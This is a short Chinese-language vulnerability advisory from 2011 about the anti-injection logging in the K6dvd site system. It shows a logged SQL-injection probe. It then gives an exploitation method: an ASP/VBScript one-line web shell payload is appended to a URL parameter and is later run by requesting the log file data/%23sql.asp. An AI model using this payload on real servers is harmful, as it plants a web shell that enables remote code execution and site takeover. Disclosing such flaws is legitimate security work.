K6dvd 音乐网防注入程序漏洞

发布日期：2011-04.22
发布作者：佚名

漏洞类型：设计错误
漏洞分析：

K6dvd 影视系统是国内不错的音乐发表管理系统！

随便找了个带参数的URL 提交了个' 返回如下：

恩，防注射系统！大多搞渗透的朋友应该都见过~

非法操作！系统做了如下记录↓
操作ＩＰ：xxx.xxx.xxx.xx
操作时间：2009-5-28 19:33:47
操作页面：/yxplay.asp
提交方式：ＧＥＴ
提交参数：id
提交数据：109446'



利用方法，在任何的URL参数后面带上 and =><script runat=server language=vbscript>eval request(chr(35))</script>

然后访问data/%23sql.asp 就可以执行一句话小马了:

标签分类：